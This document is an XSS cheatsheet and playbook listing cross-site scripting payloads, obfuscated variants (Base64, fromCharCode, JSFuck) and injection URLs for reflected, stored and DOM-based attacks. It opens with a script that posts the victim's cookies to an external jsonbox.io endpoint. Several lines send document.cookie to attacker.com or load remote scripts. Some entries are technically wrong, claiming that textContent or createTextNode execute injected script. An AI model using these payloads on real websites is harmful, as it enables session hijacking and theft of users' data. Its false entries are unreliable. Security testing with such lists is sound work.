XSS Cheatsheet
javascript
// Running this code when a XSS attack is feasible will send the cookie to an API
<script>
fetch('https://jsonbox.io/box_fd90d69348aabf9a9383', {
headers: { "Content-Type": "application/json; charset=utf-8" },
method: 'POST',
body: JSON.stringify({ cookie: document.cookie })
})
.then(response => response.json())
.then(data => console.log(data))
</script>
html
<!-- Basic payload -->
<script>alert('XSS')</script>
<!-- Image tag payload -->
<img src=x onerror=alert('XSS')>
<!-- If you control the URL -->
<svg onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval is not enabled -->
<svg onload=location=name>
<!-- Nested SVG payload -->
<svg><svg onload=alert('XSS')></svg>
<!-- Audio tag payload with window name control -->
<audio src=x onerror=eval(name)>
<!-- Image tag payload with URL control -->
<img src=x onerror=eval(`'`+URL)>
<!-- External script payload -->
<script src=//example.com></script>
<!-- Iframe payload with window name control -->
<iframe onload=src=top.name></iframe>
<!-- Iframe payload with URL control -->
<iframe onload=eval(`'`+URL)></iframe>
<!-- Iframe payload with random number of iframes -->
<iframe onload=src=contentWindow.name+/\NJ.₨?/></iframe>
<!-- Iframe payload with external script for Firefox -->
<iframe srcdoc="<svg><script/href=//example.com /></iframe>
<!-- Iframe payload with external script and disabled inline styles -->
<iframe srcdoc="<script/src=//example.com></script>"></iframe>
<!-- Inline style payload with allowed inline styles -->
<style onload=eval(name)></style>
<!-- Inline style payload with URL control -->
<style onload=eval(`'`+URL)></style>
<!-- Inline style payload with blocked inline styles -->
<style onerror=eval(name)></style>
<!-- Importing external script with SVG -->
<svg onload=import(/\\example.com/)></svg>
<!-- Importing external script with style -->
<style onload=import(/\\example.com/)></style>
<!-- Importing external script with iframe -->
<iframe onload=import(/\\example.com/)></iframe>
---OBFUSCATED---
<!-- Polyglot: HTML/JavaScript/CSS -->
<script>/*<svg/*/alert`XSS`//</script>
<!-- Polyglot: HTML/JavaScript/URL -->
';alert('XSS');//';alert('XSS');//-->
<!-- Obfuscated payload using Base64 encoding -->
<script>eval(atob('YWxlcnQoIlhTUyIp'));</script>
<!-- Obfuscated payload using String.fromCharCode() -->
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41))</script>
<!-- Obfuscated payload using JSFuck -->
<script>eval((![]+[])[+[]]+(![]+[])[+!+[]]+(!![]+[][[]])[+[]]+(!![]+[][[]])[+!+[]]+(!![]+[][[]])[+!+[]+!+[]]+(!![]+[][[]])[+!+[]+!+[]+!+[]])</script>
<!-- Obfuscated payload using HTML entities -->
<script>alert('XSS');</script>
<!-- Obfuscated payload using backticks instead of quotes -->
<script>alert(`XSS`)</script>
<!-- Obfuscated payload using a custom function and setTimeout() -->
<script>
function xss() {
alert('XSS');
}
setTimeout(xss, 0);
</script>
<!-- Obfuscated payload using a self-invoking anonymous function -->
<script>
(function() {
alert('XSS');
})();
</script>
<!-- Obfuscated payload using JavaScript comments and line breaks -->
<script>//<!--
alert(/*
*/'XSS'/*
*/);//--></script>
XSS Playbook
XSS Test Commands
Reflected XSS:
#Test if a URL parameter is vulnerable to XSS by appending a simple script tag to the parameter:
https://example.com/search?query=<script>alert(‘XSS’)</script>
#Use the <img> tag to execute a script in the victim’s browser:
https://example.com/search?query=<img src=“javascript:alert(‘XSS’)”>
#Try to execute a script using the onerror attribute of an image tag:
https://example.com/search?query=<img src=x onerror=alert(‘XSS’)>
#Use the document.cookie command to steal the victim’s cookies:
https://example.com/search?query=<script>alert(document.cookie)</script>
#Use the document.location command to redirect the victim’s browser to a different page:
https://example.com/search?query=<script>document.location=‘https://attacker.com’</script>
#Use the XMLHttpRequest command to send the victim’s data to a server controlled by the attacker:
https://example.com/search?query=<script>new Image().src=“https://attacker.com/?data=“+document.cookie;</script>
#Use the localStorage command to store data in the victim’s browser:
https://example.com/search?query=<script>localStorage.setItem(‘username’, ‘attacker’)</script>
#Use the window.open command to open a new window in the victim’s browser:
https://example.com/search?query=<script>window.open(‘https://attacker.com’)</script>
#Try to execute a script using the onload attribute of an image tag:
https://example.com/search?query=<img src=x onload=alert(‘XSS’)>
#Use the document.write command to insert content into the page:
https://example.com/search?query=<script>document.write(‘Hello, world!’)</script>
Stored XSS:
#Inject a simple script tag into a comment or message field:
<script>alert(‘XSS’)</script>
#Use the <img> tag to execute a script when the page is loaded:
<img src=“javascript:alert(‘XSS’)”>
#Inject a script using the onerror attribute of an image tag:
<img src=x onerror=alert(‘XSS’)>
#Use the document.cookie command to steal the victim’s cookies:
<script>new Image().src=“https://attacker.com/?data=“+document.cookie;</script>
#Use the XMLHttpRequest command to send the victim’s data to a server controlled by the attacker:
<script>var xhr=new XMLHttpRequest();xhr.open(‘GET’, ‘https://attacker.com/?data=‘+document.cookie, true);xhr.send();</script>
#Use the localStorage command to store data in the victim’s browser:
<script>localStorage.setItem(‘username’, ‘attacker’)</script>
#Use the window.open command to open a new window in the victim’s browser:
<script>window.open(‘https://attacker.com’)</script>
#Inject a script using the onload attribute of an image tag:
<img src=x onload=alert(‘XSS’)>
#Use the document.write command to insert content into the page:
<script>document.write(‘Hello, world!’)</script>
#Use the prompt command to display a prompt in the victim’s browser:
<script>prompt(‘Enter your password:’)</script>
DOM-based XSS:
#Use the location.hash property to execute a script when a specific URL is accessed:
https://example.com/#<script>alert(‘XSS’)</script>
#Inject a script using the innerHTML property of an element:
<div id=“test”></div><script>document.getElementById(‘test’).innerHTML=‘<script>alert(\’XSS\’)<\/script>’;</script>
#Use the textContent property to inject text that is interpreted as HTML:
<div id=“test”></div><script>document.getElementById(‘test’).textContent=‘<script>alert(\’XSS\’)<\/script>’;</script>
#Inject a script using the setAttribute method:
<div id=“test”></div><script>document.getElementById(‘test’).setAttribute(‘data’, ‘<script>alert(\’XSS\’)<\/script>’);</script>
#Use the createTextNode method to inject a script:
<div id=“test”></div><script>var node = document.createTextNode(‘<script>alert(\’XSS\’)<\/script>’);document.getElementById(‘test’).appendChild(node);</script>
#Use the onload attribute of an image tag to execute a script:
<img src=“javascript:alert(‘XSS’)” onload=“this.removeAttribute(‘onload’)”/>
#Inject a script using the insertAdjacentHTML method:
<div id=“test”></div><script>document.getElementById(‘test’).insertAdjacentHTML(‘beforeend’, ‘<script>alert(\’XSS\’)<\/script>’);</script>
#Use the outerHTML property to replace an element with a script:
<div id=“test”></div><script>document.getElementById(‘test’).outerHTML=‘<script>alert(\’XSS\’)<\/script>’;</script>
#Inject a script using the insertBefore method:
<div id=“test”></div><script>var node = document.createElement(‘script’);node.text = “alert(‘XSS’)”;document.body.insertBefore(node, document.body.firstChild);</script>
#Use the innerHTML property to inject an element and then execute a script inside of it:
<div id=“test”></div><script>document.getElementById(‘test’).innerHTML=‘<div><script>alert(\’XSS\’)<\/script></div>’;</script>